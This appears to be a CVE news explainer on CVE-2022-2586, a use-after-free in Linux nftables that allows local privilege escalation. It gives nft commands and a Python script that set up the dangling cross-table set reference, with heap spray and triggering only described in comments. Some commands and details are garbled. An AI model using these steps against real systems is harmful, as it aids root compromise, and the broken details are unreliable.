CVE CyberSecurity Database News

CVE-2022-2586 - The Use-After-Free in nftables – Root Cause, Exploit, and Mitigations

Poster -

CVE-2022-2586 is a critical vulnerability discovered in Linux’s nftables kernel subsystem. This bug enables local privilege escalation using a crafty use-after-free condition. In simple terms, the error happens when an nft object in one table can point (reference) to a set in another table—and if that other table gets deleted, nftables can accidentally use memory that is no longer valid (the free’d set), allowing attackers to manipulate kernel memory and possibly run code as root.

This vulnerability was published and detailed by the security community, especially in the original Linux kernel patch and the Qualys security advisory.

Below, we explain the root cause in plain language, go step by step through the exploit, and show demo code so you can fully understand how this bug works.

What Are nftables and How Does the Bug Work?

nftables is the Linux kernel’s packet filtering framework (replacement for iptables). With nftables, admins can define tables, chains, sets, and objects for handling network packets.

The Bug

- nftables objects/expressions should only reference sets that exist *in the same table*.
- The vulnerablity allows an object/expression in one table to reference a set in another table.

If the set’s table is deleted, the reference is not cleared.

- The next time the referencing expression/object is evaluated, nftables uses memory that was already freed.

Visual Example (Non-exploit Scenario)

# Create tables
nft add table inet tab1
nft add table inet tab2

# In tab2, create a set and an object
nft add set inet tab2 myset { type ipv4_addr\; flags interval\; }
nft add element inet tab2 myset { 10.../8 }

# In tab1, create a rule that "accidentally" uses myset from tab2
nft add chain inet tab1 post { type filter hook postrouting priority \; }
nft add rule inet tab1 post ip saddr @tab2.myset counter

This works, but when someone removes tab2, the pointer to myset in tab1 is not invalidated. The object in tab1 now points to freed memory.

Delete Table2.

- The set will be destroyed, but Table1’s reference to it (“dangling pointer”) is not cleaned up.
4. Trigger the object/expression in Table1.

This is classic use-after-free exploitation.

Below is a conceptual Python pseudocode using pyroute2.nftables (note: real exploits will use raw netlink or C code for reliability):

import subprocess
import time

def run(cmd):
    print(f"Running: {cmd}")
    subprocess.run(cmd, shell=True)

# 1. Create tables
run("nft add table ip t1")
run("nft add table ip t2")

# 2. In t2, create set 'myset'
run("nft add set ip t2 myset { type ipv4_addr; flags interval; }")
run("nft add element ip t2 myset { 10.1.2.3 }")

# 3. In t1, create a chain & rule referencing t2's set
run("nft add chain ip t1 c1 { type filter hook output priority ; }")
run("nft add rule ip t1 c1 ip daddr @t2.myset counter")

# 4. List setup, then remove t2
run("nft list tables")
run("nft delete table ip t2")

# 5. Pack heap, spray userland objects to reclaim freed area (attacker step)
#    At this point, kernel still has references to freed memory.

# 6. Packet to trigger rule, causing use-after-free
#    (In practice, send UDP/TCP packet from local process to 10.1.2.3)

Note: Real exploitation involves a heap spray (userfaultfd+mmap or using other primitives), followed by triggering the now-dangling rule, which allows writing attacker-controlled data where the kernel expects a struct—a powerful primitive for privilege escalation.

Exploit demonstration

Here is a public exploit PoC (educational purposes only).

Real-World Impact

- Local root: a user with the ability to run nftables (dirty sudo, docker breakouts, etc) can get root.

Upgrade kernel: Patched in Linux 5.18.2, 5.15.54, 5.10.127, 5.4.202 and above.

- Backported to all major distros. See distributor advisories (e.g. Red Hat advisory).

Kernel patch diff (reference):

Patch commit 7376c1cc

More References

- Qualys advisory
- Kernel commit
- Red Hat CVE page
- nftables documentation

Conclusion

CVE-2022-2586 is a powerful example of how reference counting and object management rules are *vital* in kernel code—blurring set/table boundaries led to a serious security flaw. The quick response from the Linux community protected many systems, but always keep systems patched, and restrict privileged actions to trusted users.

For a hands-on technical deep-dive, see the original Qualys analysis.

Timeline

Published on: 01/08/2024 18:15:44 UTC
Last modified on: 01/08/2024 19:05:05 UTC